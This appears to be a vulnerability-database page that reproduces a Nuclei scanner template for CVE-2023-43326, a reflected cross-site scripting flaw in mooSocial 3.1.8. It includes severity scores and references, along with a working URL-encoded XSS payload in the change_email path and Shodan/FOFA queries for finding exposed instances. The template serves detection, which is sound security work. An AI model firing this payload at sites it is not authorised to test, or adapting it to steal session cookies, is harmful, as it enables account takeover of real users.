Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-43326
HistoryNov 23, 2023 - 11:30 a.m.

MooSocial 3.1.8 - Cross-Site Scripting

2023-11-2311:30:47
ProjectDiscovery
github.com
5
cve-2023
cross-site scripting
moosocial

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.014

Percentile

86.9%

A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.
id: CVE-2023-43326

info:
  name: MooSocial 3.1.8 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.
  reference:
    - https://github.com/ahrixia/CVE-2023-43326
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43326
    - https://moosocial.com/
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-43326
    cwe-id: CWE-79
    epss-score: 0.00666
    epss-percentile: 0.79657
    cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moosocial
    product: moosocial
    shodan-query: http.favicon.hash:"702863115"
    fofa-query: icon_hash="702863115"
  tags: cve2023,cve,xss,moosocial

http:
  - method: GET
    path:
      - "{{BaseURL}}/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "mooSocial")'
        condition: and
# digest: 490a004630440220310e54c3bfa2512ef8c5ed7a4a2f4404e38fac783268ba1c8e423271f4e6e74f02207a1dd30a82dadfd1dece2f3178c3eef779f0098c66d3f296198600563fa1b141:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.014

Percentile

86.9%

Related for NUCLEI:CVE-2023-43326